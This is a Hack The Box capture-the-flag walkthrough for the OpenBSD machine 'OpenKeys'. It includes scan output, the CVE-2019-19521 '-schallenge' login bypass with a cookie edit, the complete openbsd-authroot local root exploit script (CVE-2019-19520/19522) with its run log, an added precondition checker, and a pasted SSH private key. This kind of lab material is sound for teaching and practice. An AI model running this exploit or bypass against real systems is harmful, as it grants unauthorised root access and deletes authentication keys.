NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 15:58 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating NSE at 15:58
Completed NSE at 15:58, 0.00s elapsed
Initiating Ping Scan at 15:58
Scanning 10.10.10.199 [4 ports]
Completed Ping Scan at 15:58, 0.73s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:58
Scanning openkeys.htb (10.10.10.199) [1000 ports]
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
Increasing send delay for 10.10.10.199 from 0 to 5 due to 98 out of 244 dropped probes since last increase.
Increasing send delay for 10.10.10.199 from 5 to 10 due to max_successful_tryno increase to 5
Completed SYN Stealth Scan at 15:59, 48.62s elapsed (1000 total ports)
Initiating Service scan at 15:59
Scanning 2 services on openkeys.htb (10.10.10.199)
Completed Service scan at 15:59, 7.22s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #2) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #3) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #4) against openkeys.htb (10.10.10.199)
Retrying OS detection (try #5) against openkeys.htb (10.10.10.199)
Initiating Traceroute at 15:59
Completed Traceroute at 15:59, 0.31s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:59
Completed Parallel DNS resolution of 2 hosts. at 15:59, 0.19s elapsed
NSE: Script scanning 10.10.10.199.
Initiating NSE at 15:59
Completed NSE at 16:00, 18.99s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 2.11s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/27%OT=22%CT=1%CU=33332%PV=Y%DS=2%DC=T%G=Y%TM=5F1EACA
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=RD%CI=RI%II=RI%TS=21
OS:)OPS(O1=M54DNNSNW6NNT11%O2=M54DNNSNW6NNT11%O3=M54DNW6NNT11%O4=M54DNNSNW6
OS:NNT11%O5=M54DNNSNW6NNT11%O6=M54DNNSNNT11)WIN(W1=4000%W2=4000%W3=4000%W4=
OS:4000%W5=4000%W6=4000)ECN(R=Y%DF=Y%T=40%W=4000%O=M54DNNSNW6%CC=N%Q=)T1(R=
OS:Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=40%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=FF%IPL=38%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=FF%CD=S)

Uptime guess: 0.000 days (since Mon Jul 27 15:59:40 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   299.83 ms 10.10.14.1
2   291.70 ms openkeys.htb (10.10.10.199)

NSE: Script Post-scanning.
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Initiating NSE at 16:00
Completed NSE at 16:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.78 seconds
           Raw packets sent: 2488 (113.786KB) | Rcvd: 3558 (167.718KB)
PORT 80
The web root is an untitled page with nothing useful on it, and httpd only answers GET and HEAD, so we enumerate directories. Two things from the scan are worth keeping in mind: the server banner is OpenBSD httpd and SSH is OpenSSH 8.1, so this is an OpenBSD box, which decides both the auth bypass and the privilege escalation later on.
GOBUSTER
┌─[root@liquid]─[~/Desktop/HTB/openkeys]
└──╼ #gobuster dir -u http://10.10.10.199 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.199
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/27 16:12:59 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
Digging into the directories gobuster found turns up two files:
- auth.php
- auth.php.swp
AUTH.PHP.SWP
auth.php.swp is a Vim swap file left behind while someone edited auth.php, so it leaks the source; strings on it (or vim -r to recover it) is enough. It points us at another file, /auth_helpers/check_auth, and that file in turn gives us the username jennifer.
Rather than reverse check_auth, we bypass the OpenBSD authentication it relies on (the -schallenge bug, CVE-2019-19521). Credit to my friend @MRCAT for the pointer.

The process:
- Log in to the web form with USERNAME: -schallenge and any PASSWORD, e.g. 1234567. The login is accepted.
- Intercept the following request in Burp and change the cookie to username=jennifer.
- Without that change the application answers that the OpenSSH key was not found for user -schallenge: the bypass authenticated us, but as a user who has no key on file.
- With the cookie set to jennifer we get jennifer's SSH private key.

Why this works: the libc auth layer hands the username to the login_* helper program as a command-line argument, and the helper parses its arguments with getopt. A username of -schallenge is therefore read as the option -s with the argument challenge, which switches the helper into its challenge-response mode; in that mode it never checks the password, and the caller treats its reply as a successful authentication, so any password is accepted.
GETTING USER ACCESS
Save the key as id_rsa, chmod 600 it (ssh refuses group- or world-readable keys) and log in as jennifer:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/openkeys]
└──╼ #ssh -i id_rsa jennifer@10.10.10.199
Last login: Mon Jul 27 10:22:24 2020 from 10.10.14.90
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ ls
root     user.txt
Here we go with our user flag.

GETTING ROOT ACCESS
The banner says OpenBSD 6.6, so we look for a local root for that release. bcoles' openbsd-authroot script chains two of the Qualys bugs: CVE-2019-19520 (xlock is setgid auth and loads a driver library from a user-controlled LIBGL_DRIVERS_PATH, giving a shell with group auth) and CVE-2019-19522 (group auth can write /etc/skey/ or /var/db/yubikey/, so we plant a known root entry and su to root with its one-time password). It needs S/Key or YubiKey enabled in login.conf, which the script checks first.
https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot
#!/bin/sh
# openbsd-authroot - OpenBSD local root exploit for CVE-2019-19520 and CVE-2019-19522
# Code mostly stolen from Qualys PoCs:
# - https://www.openwall.com/lists/oss-security/2019/12/04/5
#
# Uses CVE-2019-19520 to gain 'auth' group permissions via xlock;
# and CVE-2019-19522 to gain root permissions via S/Key or YubiKey
# (requires S/Key or YubiKey authentication to be enabled).
# ---
# $ ./openbsd-authroot
# openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
# [*] checking system ...
# [*] system supports YubiKey authentication
# [*] id: uid=1002(test) gid=1002(test) groups=1002(test)
# [*] compiling ...
# [*] running Xvfb ...
# [*] testing for CVE-2019-19520 ...
# (EE)
# Fatal server error:
# (EE) Server is already active for display 66
#       If this server is no longer running, remove /tmp/.X66-lock
#       and start again.
# (EE)
# [+] success! we have auth group permissions
#
# WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
#
# [*] trying CVE-2019-19522 (YubiKey) ...
# Your password is: krkhgtuhdnjclrikikklulkldlutreul
# Password:
# ksh: /etc/profile[2]: source: not found
# # id
# uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# ---
# 2019-12-06 - <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-19520

echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"

echo "[*] checking system ..."

# Which second-stage bug applies depends on the auth= styles in login.conf.
if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
  echo "[*] system supports YubiKey authentication"
  target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
  echo "[*] system supports S/Key authentication"
  target='skey'
  if ! test -d /etc/skey/ ; then
    echo "[-] S/Key authentication enabled, but has not been initialized"
    exit 1
  fi
else
  echo "[-] system does not support S/Key / YubiKey authentication"
  exit 1
fi

echo "[*] id: `id`"

echo "[*] compiling ..."

# Fake Mesa driver: xlock (setgid auth) dlopen()s it from LIBGL_DRIVERS_PATH.
# The constructor promotes the saved gid (auth) to the real gid and execs ksh.
cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>

static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c

echo "[*] running Xvfb ..."

# xlock needs a display to connect to; a headless Xvfb on :66 will do.
display=":66"
env -i /usr/X11R6/bin/Xvfb $display -cc 0 &

echo "[*] testing for CVE-2019-19520 ..."

group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)

if [ "$group" = "auth" ]; then
  echo "[+] success! we have auth group permissions"
else
  echo "[-] failed to acquire auth group permissions"
  exit 1
fi

# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit

echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5

# CVE-2019-19522: /etc/skey and /var/db/yubikey are writable by group auth,
# so plant a root record whose one-time password we already know, then su.
if [ "$target" = "skey" ]; then
  echo "[*] trying CVE-2019-19522 (S/Key) ..."
  echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
  env -i TERM=vt220 su -l -a skey
fi

if [ "$target" = "yubikey" ]; then
  echo "[*] trying CVE-2019-19522 (YubiKey) ..."
  echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
  env -i TERM=vt220 su -l -a yubikey
fi
Save the script in jennifer's home directory (here as ./root), make it executable and run it. It needs cc, Xvfb and xlock on the box, and it deletes root's existing S/Key entry, so it is not something to run on a host you care about. When prompted, paste the S/Key password the script prints.
openkeys$ ./root
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions

WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).

[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password:
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# cd /root
openkeys# ls
.Xdefaults  .composer  .cshrc  .cvsrc  .forward  .login  .profile  .ssh  .viminfo  dead.letter  root.txt
openkeys# cat root.txt
f3a553b1697050ae885e7c02dbfc6efa
Here we go with our root flag!!
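Before running a destructive exploit it is worth confirming its preconditions by hand. The following helper is added here (mine, not part of the walkthrough or of bcoles' script): it reproduces the script's login.conf check a little more carefully (uncommented :auth= entries only, split on commas) and also checks that xlock carries the setgid bit. It takes a root directory argument so it can be pointed at a constructed tree for testing or at / on the target; the sample login.conf in the usage comment is constructed.

```shell
#!/bin/sh
# Added precondition check for openbsd-authroot (not from the walkthrough).
# authroot_target ROOTDIR prints which second stage applies:
#   yubikey | skey | skey-uninitialized | none
# and exits 0 only for the two usable cases. ROOTDIR is "/" on a real host.
authroot_target() {
    conf="$1/etc/login.conf"
    [ -r "$conf" ] || { echo none; return 1; }
    # Collect the auth= values of uncommented lines (e.g. "passwd,skey")
    # and turn commas and newlines into spaces for word matching.
    styles=$(grep -v '^[[:space:]]*#' "$conf" \
             | sed -n 's/.*:auth=\([^:]*\).*/\1/p' \
             | tr ',\n' '  ')
    case " $styles " in
        *" yubikey "*)
            echo yubikey; return 0 ;;
        *" skey "*)
            # Same rule as the script: skey enabled but never initialized
            # means /etc/skey does not exist and the planted record cannot land.
            if [ -d "$1/etc/skey" ]; then echo skey; return 0; fi
            echo skey-uninitialized; return 1 ;;
    esac
    echo none; return 1
}

# xlock_is_setgid ROOTDIR: CVE-2019-19520 needs xlock to be setgid
# (group auth on OpenBSD); -perm -2000 tests only the setgid bit.
xlock_is_setgid() {
    x="$1/usr/X11R6/bin/xlock"
    [ -f "$x" ] && [ -n "$(find "$x" -perm -2000 -print)" ]
}

# Usage on the target (as jennifer, before ./root):
#   authroot_target / && xlock_is_setgid / && echo "worth trying"
# Usage against a constructed tree for a dry run:
#   t=$(mktemp -d); mkdir -p "$t/etc/skey"
#   printf 'default:\\\n\t:auth=passwd,skey:\\\n\t:tc=auth-defaults:\n' > "$t/etc/login.conf"
#   authroot_target "$t"      # prints: skey
```

The group check on xlock is deliberately left out: ls -l /usr/X11R6/bin/xlock on the target shows it, and a file-owned-by-auth test would not be portable to the constructed tree.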
ID_RSA JENNIFER
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAo4LwXsnKH6jzcmIKSlePCo/2YWklHnGn50YeINLm7LqVMDJJnbNx
OI6lTsb9qpn0zhehBS2RCx/i6YNWpmBBPCy6s2CxsYSiRd3S7NftPNKanTTQFKfOpEn7rG
nag+n7Ke+iZ1U/FEw4yNwHrrEI2pklGagQjnZgZUADzxVArjN5RsAPYE50mpVB7JO8E7DR
PWCfMNZYd7uIFBVRrQKgM/n087fUyEyFZGibq8BRLNNwUYidkJOmgKSFoSOa9+6B0ou5oU
qjP7fp0kpsJ/XM1gsDR/75lxegO22PPfz15ZC04APKFlLJo1ZEtozcmBDxdODJ3iTXj8Js
kLV+lnJAMInjK3TOoj9F4cZ5WTk29v/c7aExv9zQYZ+sHdoZtLy27JobZJli/9veIp8hBG
717QzQxMmKpvnlc76HLigzqmNoq4UxSZlhYRclBUs3l5CU9pdsCb3U1tVSFZPNvQgNO2JD
S7O6sUJFu6mXiolTmt9eF+8SvEdZDHXvAqqvXqBRAAAFmKm8m76pvJu+AAAAB3NzaC1yc2
EAAAGBAKOC8F7Jyh+o83JiCkpXjwqP9mFpJR5xp+dGHiDS5uy6lTAySZ2zcTiOpU7G/aqZ
9M4XoQUtkQsf4umDVqZgQTwsurNgsbGEokXd0uzX7TzSmp000BSnzqRJ+6xp2oPp+ynvom
dVPxRMOMjcB66xCNqZJRmoEI52YGVAA88VQK4zeUbAD2BOdJqVQeyTvBOw0T1gnzDWWHe7
iBQVUa0CoDP59PO31MhMhWRom6vAUSzTcFGInZCTpoCkhaEjmvfugdKLuaFKoz+36dJKbC
f1zNYLA0f++ZcXoDttjz389eWQtOADyhZSyaNWRLaM3JgQ8XTgyd4k14/CbJC1fpZyQDCJ
4yt0zqI/ReHGeVk5Nvb/3O2hMb/c0GGfrB3aGbS8tuyaG2SZYv/b3iKfIQRu9e0M0MTJiq
b55XO+hy4oM6pjaKuFMUmZYWEXJQVLN5eQlPaXbAm91NbVUhWTzb0IDTtiQ0uzurFCRbup
l4qJU5rfXhfvErxHWQx17wKqr16gUQAAAAMBAAEAAAGBAJjT/uUpyIDVAk5L8oBP3IOr0U
Z051vQMXZKJEjbtzlWn7C/n+0FVnLdaQb7mQcHBThH/5l+YI48THOj7a5uUyryR8L3Qr7A
UIfq8IWswLHTyu3a+g4EVnFaMSCSg8o+PSKSN4JLvDy1jXG3rnqKP9NJxtJ3MpplbG3Wan
j4zU7FD7qgMv759aSykz6TSvxAjSHIGKKmBWRL5MGYt5F03dYW7+uITBq24wrZd38NrxGt
wtKCVXtXdg3ROJFHXUYVJsX09Yv5tH5dxs93Re0HoDSLZuQyIc5iDHnR4CT+0QEX14u3EL
TxaoqT6GBtynwP7Z79s9G5VAF46deQW6jEtc6akIbcyEzU9T3YjrZ2rAaECkJo4+ppjiJp
NmDe8LSyaXKDIvC8lb3b5oixFZAvkGIvnIHhgRGv/+pHTqo9dDDd+utlIzGPBXsTRYG2Vz
j7Zl0cYleUzPXdsf5deSpoXY7axwlyEkAXvavFVjU1UgZ8uIqu8W1BiODbcOK8jMgDkQAA
AMB0rxI03D/q8PzTgKml88XoxhqokLqIgevkfL/IK4z8728r+3jLqfbR9mE3Vr4tPjfgOq
eaCUkHTiEo6Z3TnkpbTVmhQbCExRdOvxPfPYyvI7r5wxkTEgVXJTuaoUJtJYJJH2n6bgB3
WIQfNilqAesxeiM4MOmKEQcHiGNHbbVW+ehuSdfDmZZb0qQkPZK3KH2ioOaXCNA0h+FC+g
dhqTJhv2vl1X/Jy/assyr80KFC9Eo1DTah2TLnJZJpuJjENS4AAADBAM0xIVEJZWEdWGOg
G1vwKHWBI9iNSdxn1c+SHIuGNm6RTrrxuDljYWaV0VBn4cmpswBcJ2O+AOLKZvnMJlmWKy
Dlq6MFiEIyVKqjv0pDM3C2EaAA38szMKGC+Q0Mky6xvyMqDn6hqI2Y7UNFtCj1b/aLI8cB
rfBeN4sCM8c/gk+QWYIMAsSWjOyNIBjy+wPHjd1lDEpo2DqYfmE8MjpGOtMeJjP2pcyWF6
CxcVbm6skasewcJa4Bhj/MrJJ+KjpIjQAAAMEAy/+8Z+EM0lHgraAXbmmyUYDV3uaCT6ku
Alz0bhIR2/CSkWLHF46Y1FkYCxlJWgnn6Vw43M0yqn2qIxuZZ32dw1kCwW4UNphyAQT1t5
eXBJSsuum8VUW5oOVVaZb1clU/0y5nrjbbqlPfo5EVWu/oE3gBmSPfbMKuh9nwsKJ2fi0P
bp1ZxZvcghw2DwmKpxc+wWvIUQp8NEe6H334hC0EAXalOgmJwLXNPZ+nV6pri4qLEM6mcT
qtQ5OEFcmVIA/VAAAAG2plbm5pZmVyQG9wZW5rZXlzLmh0Yi5sb2NhbAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE